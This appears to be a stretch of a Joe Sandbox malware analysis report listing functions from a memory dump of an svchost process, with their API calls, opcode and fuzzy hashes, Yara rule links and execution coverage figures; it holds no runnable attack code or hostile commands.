                                                                                                                                                                                                                                                                                                              Function 00007DF4AE66D66C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • GetSystemInfo.KERNELBASE(?,00007DF4AE67EF2F,?,?,?,?,00000000,00000000), ref: 00007DF4AE66D689
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: InfoSystem
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 31276548-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                                                                                                                                                                              • Instruction ID: e0f64d4df8b8524ba185f2c3a6c38c027fcf67d8ac59667f0214f8043c6aba86
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c8b29b2e46d8ecbda91bf3fbd1e3dce5dd76455cbfab89285b4f133e11fa366
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9E04831A158048BF34AF731DE954D77371FB65304BC05963D417C51E6EE2D5146C681
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE602B9C Relevance: 1.4, APIs: 1, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: a190d55e66fa9972329321cd9e5dea0e61da3d8956b03d4ece5cfa8d531b37a8
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6d55638fa937caa8ee97a33dc9e2ffbd37f0cdd1b2ebfc0fcae812064c5a3d56
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a190d55e66fa9972329321cd9e5dea0e61da3d8956b03d4ece5cfa8d531b37a8
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29412A70518E4D8FEBE4EF19C885BA677E1FBA8300F504A6AD85EC7251DB34E944CB81
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE6BE880 Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • calloc.MSVCRT(?,?,?,?,0000414D,?,?,00007DF4AE6BEB21,?,?,?,?,0010D940,?,?,00007DF4AE6093F8), ref: 00007DF4AE6BE908
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: calloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 116888554fdc444eb3b31b19c2a321043db278ac29c98a48040ccefe69ec064d
                                                                                                                                                                                                                                                                                                              • Instruction ID: 505f5863c87c66b1b7196665489f560650e4969211282e59bd736e2d4c507dca
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 116888554fdc444eb3b31b19c2a321043db278ac29c98a48040ccefe69ec064d
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02514F30655D499BE788EB26C5587E7B3A1FFA8308F80553AD02FC2692CF38A555C780
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5FDA74 Relevance: 1.4, APIs: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007DF4AE60E150: NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF4AE60C0F7), ref: 00007DF4AE60E160
                                                                                                                                                                                                                                                                                                              • malloc.MSVCRT ref: 00007DF4AE5FDB44
                                                                                                                                                                                                                                                                                                                • Part of subcall function 00007DF4AE6077EC: malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4AE62740A), ref: 00007DF4AE60780B
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc$AcceptConnectPort
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1211516610-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                                                                                                                                                                              • Instruction ID: ce1f01789916a771e5f66a962110186c0d478c8cdac8b7612809ce88292335b3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5565b0a7f35f124f6bcd3fbf3053ca4a01fc296d0f2770306c12d9fdd2224762
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D417C70508A4C8FEB64EF59D8897EA77E4FB58301F10457AD84EC7291EA34E984CB92
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E4F54 Relevance: 1.4, APIs: 1, Instructions: 126COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                                                                                                                                                                                              • Instruction ID: c90619cd122082683bfc7272dd5cd0c4b8dafcb7c9260676b8ec5728bb6763be
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81c6eecad20e58c8d38abd6a23315df80df12776ef0665d00e4ffea17a923ccf
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9531F530A09A495FFB18EBA5E855977B3F1FF54355700422AE82FC2591EF24F84187C0
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE60F5CC Relevance: 1.4, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: calloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 51eb558422bbb07d68cd050985e80f4d6919dc7d059917d871d23eb38f6f5020
                                                                                                                                                                                                                                                                                                              • Instruction ID: 91b86667508bb6cfc82324200155227d0357fb4b9bdb61fbdc70bc9f75e23496
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51eb558422bbb07d68cd050985e80f4d6919dc7d059917d871d23eb38f6f5020
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF310731B1D9584FF7189F59988157B33E4EB8D314F609A3FE95FC33A2CA18B8024681
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F5C3F Relevance: 1.4, APIs: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: calloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 6a4f20b682c10cd58629493a9c6e97ff52dacf867127907d93805cb69a04b7ae
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1c468c1cb228f772f4e05f08fbad5ded41e6cf12b00d9fd35bb649efe4ae2cb6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a4f20b682c10cd58629493a9c6e97ff52dacf867127907d93805cb69a04b7ae
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F831AB3121DE488FEB54EB18C490AEBB3E0FF98310F50066AD05AC7292DA35F881CB81
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE6077EC Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              • malloc.MSVCRT(?,?,?,?,?,FFFFFFFF,-00000001,-00000002,-00000001,00007DF4AE62740A), ref: 00007DF4AE60780B
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                                                                                                                                                                                                              • Instruction ID: 4b3077f9c8bd2d7f045d305643b2296916907e6192c2df1976aadba52bc53a61
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f31908e5917b62f5e8fcfc63ea224ee910f3ac586d2aa649c3aaf2b7337a1fee
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7521D531614D1C8FEB48EF1DD88C6A277E1FB6831230441B7D81ECB255DA34E885CB90
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE6DCB9C Relevance: 1.3, APIs: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                                                                                                                                                                                                              • Instruction ID: 09a699fe095d423f2723bca02ae3129e5488c63c3005edb23714b64d53479086
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 472e16019ba601094a4c2923f039f601fa415deb3ae2891c44a4e6fa2e872d25
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71214F70A19C1C4FDEA4EF1DC1C896A77E1EB883147E926A2D92EC7299D525EC80C780
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5F31B4 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                                                                                                                                                                                              • Instruction ID: 93cb3aedd082082bb79b7db81058dfd894057b4bcd626501f76b15fda2126821
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66b33f43179977e6021ab23a99b744e2774dbd865e09dbf7877d2203174fb5a6
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58118430B055484BFBACDBBAF96936736E1EF94204F14427BD81FC25E6EE289904D750
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5FD818 Relevance: 1.3, APIs: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: Path$AcceptConnectNameName_Portfreemalloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1330699908-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                                                                                                                                                                              • Instruction ID: ce426f038a350e6e1969c9bdb9eca38e838652a520f976a14e3bf5c24ff96195
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d511f70975a129a2a77dd28de2b940d4a8b4f0af03d16e9a8499343f86fd52b2
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA012631218E084FE748BB5DEC8E5F677E1E79976270481BAE40BC3261DD39E8458BD1
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E272C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                                                                                                                                                                              • Instruction ID: 3b7d867ef1a5ac9267b13b588a9f561518c02231138c584e3694a79c7436cdcb
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 352c65fe592b7790d915c399a828791dec36a0441c5dd9355c9a9937d9e241a1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E018634A19D0A8BEB98DB6DA81462732F1FB58319754817FD02EC76D4D639E8428741
                                                                                                                                                                                                                                                                                                              Function 0000018B292A19B4 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                              control_flow_graph 80 18b292a19b4-18b292a19d1 82 18b292a19d3-18b292a19da 80->82 83 18b292a19dd-18b292a19e4 80->83 82->83 84 18b292a19e6-18b292a19f9 VirtualFree 83->84 85 18b292a19fb-18b292a1a09 83->85 84->85
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000002.2739348169.0000018B292A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000018B292A0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_2_18b292a0000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                                                                                                                                                                                                              • Instruction ID: b736dc8579002965c6bb71e8f9ffe96a594ffcd6831d8ac1ce1513d6cb2488e8
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 35bf1a61f723f2ebe461f85329f49c45ff48ebd9128404ff90ab1984f0afa418
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7F0BD35154A098BDF5DEE56C4D5AE533A5FB28301F44057A8C0ACB156DA21E941C751
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE643A10 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                                                                                                                                                                              • Instruction ID: 9af0e2d2c0ee7a89b19df03b66b2b52f37d1cfb274ec447601bbd9d91c957532
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ceb1b3ac1685b1e70d1ec6c741c6d46ebc4cdc23072f6723e1ceb22e799d32bf
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F0443069B94ACBFF58B76699A823677E0EF14306B44142BE80BC16A0CB2CD4949722
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E4090 Relevance: 1.3, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: calloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2635317215-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                                                                                                                                                                                              • Instruction ID: f3a61651c4cfdbd56dd332923541d7f3a10f8d962fba79ca307760dc7481bfa3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: de320a19c5c687e61a4a128f89672fe303437e4185c336a85925eb16b6c1a1ac
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9F0E23061490A4FFB84AB2DACACB3636E0EF88301F904076D80ACA2A0DF78CC85D300
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE610FC4 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                                                                                                                                                                              • Instruction ID: d455618fa8edaaf10e452e6fc82d2c7b88c492682e57083ab52f18e1b5b85664
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 803f3e239e71c094a11688905a13a5b4d70b1f6a51e1afa360838daebce55db3
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86D05E50B57D0D0FAB98637F1D9916B31E5D7D81267881537BC1DC3251EC19CC854260
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E40EC Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                                                                                                                                              • Instruction ID: f0d89b08535e6f93dba2fc6a92585cbd422c90908decbcb857ddf687503a6a37
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 18e477c43355e40e63571de48535b83294ddf8e770562ea63db4867f7ce24bd4
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E5D05E30A0AE0B0BFF9CABEA54A963632E0DF68386710003DD41BC1591CA59C841D300
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5EFF84 Relevance: 1.3, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: malloc
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 2803490479-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1ed2b0cac598b82b7e70a97d3d61746c7b2b2f1d05c1c5a7b5d7b4b181fc6157
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed35e0f212f0a254e6baa594bb9cd44b71b95e4339f86f8b9042d1b76f972d3e
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CDD0121070AD092BBB5437FA1D9C53635D4C7282267100022F825C0160EE48C990D322
                                                                                                                                                                                                                                                                                                              Function 00007DF4AE5E4D90 Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000010.00000003.2736860852.00007DF4AE5E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4AE5E1000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_16_3_7df4ae5e1000_svchost.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID: free
                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                              • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 8c9c40f6bef9ec4df3a79262cd85a6e642b7eef118dea444bc23fc5fe1570952
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ab7e135269a5abfd494e29a849e8a7504a641c2ba0334102f1d09b8f57cd51c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73B0122881BCEB06FD5C37F75E6A02F3460AF04205FC40019E827C0450F74CC0948342

                                                                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                                                                              Execution Coverage:5.2%
                                                                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:5.6%
                                                                                                                                                                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                                                                                                                                                                              Total number of Nodes:250
